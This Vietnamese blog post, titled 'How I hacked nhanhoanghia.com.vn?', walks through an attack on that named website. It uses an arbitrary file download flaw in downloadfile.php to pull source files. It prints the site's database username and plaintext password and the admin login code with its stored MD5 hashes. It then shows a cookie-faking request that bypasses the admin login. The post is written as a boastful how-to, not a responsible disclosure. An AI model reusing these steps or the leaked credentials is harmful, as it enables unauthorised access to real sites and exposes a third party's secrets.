J2TEAM Security: A must-have extension for Chrome users. Install now!

How I hacked nhanhoanghia.com.vn?

How I hacked nhanhoanghia.com.vn? | Juno_okyo's Blog
Hôm nay xin giới thiệu 1 bug PHP.
Bug : www.abc.com/downloadfile.php?file=abc/def.zip

Khai thác : www.abc.com/downloadfile.php?file=index.php
Ngoài file index.php bạn có thể download nhiều file nữa , từ đó bạn có thể nghiên cứu mà tấn công.

Victim www.nhanhoanghia.com.vn

Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=index.php
Sau khi download file index.php ta mở ra : tìm được như sau :
PHP Code:
include "include/sql.php";
    include 
"include/init.php";
    include 
"mynewsfunction.php";
    include 
"myhtmlfunction.php";
    include 
"myprofunction.php"
Sau đó tiếp tục down file init.php về :
Code:
$server="localhost";
$username="nhanhoan_admin";
$password="ijnuhbygv";
$dbase="nhanhoan_db";
Tìm được user và pass của database.
Choài database là nhanhoan_db => file : nhanhoan_db.sql
Test thử :
Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=nhanhoan_db.sql
Bùn 1 s.
Tìm cách khác vậy,
download các file mà index.php include về.
Tìm được trong file mynewsfunction.php dòng :
Code:
//include "webadmin/init_fr.php";
Ha nó chú thích lại loài ra được cái trang admin.
=> http://www.nhanhoanghia.com.vn/webadmin/

Tiếp down trang login về :
Code:
http://www.nhanhoanghia.com.vn/downloadfile.php?file=webadmin/login.php
login.php
Code:
....
<form name="form1" method="post" action="check.php?action=login">...
tiếp tục down trang check.php về :
Code:
<?
@session_start();
include("passinfo.php");
if($action == "login")
 {
  if(md5($username)!=$u)
   {
   echo "<script>
      location.href='login.php';
      </script> 
    ";
   exit(); 
   }
  if(md5($password)!=$p)
   {
   echo "<script>
      location.href='login.php';
      </script> 
    ";
   exit(); 
   }
  echo "<script>
      location.href='cookie.php?user=$p';
      </script> 
   ";
  exit(); 
 }
if($action == "logout")
 {
 session_unregister("bdvn_user");
 echo "<script>window.top.location.href = 'login.php';</script>";
 }

if(!$bdvn_user)
 {
  echo "<script>window.top.location.href = 'login.php';</script>";
  exit();
 }

?>
kekeke passinfo.php : nó đó
Down nó zìa lun
Code:
<? $u = "62b8f89cf8e72905e8d3d5cd4e143bef";  $p = "6487171dedb7dd65df63f63365a7c6f1"; ?>
Chít cha md5 dịch ko ra. Hic bùn wa'

Để ý lại 1 chút : trong file check.php có 1 đoạn
location.href='cookie.php?user=$p';
àh ha vậy là hiểu gồi heheh , nếu thích thì tải file cookie.php zìa.

nhưng mà chúng ta có thể fake cookie trực tiếp :
http://nhanhoanghia.com.vn/webadmin/...php?user=admin
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!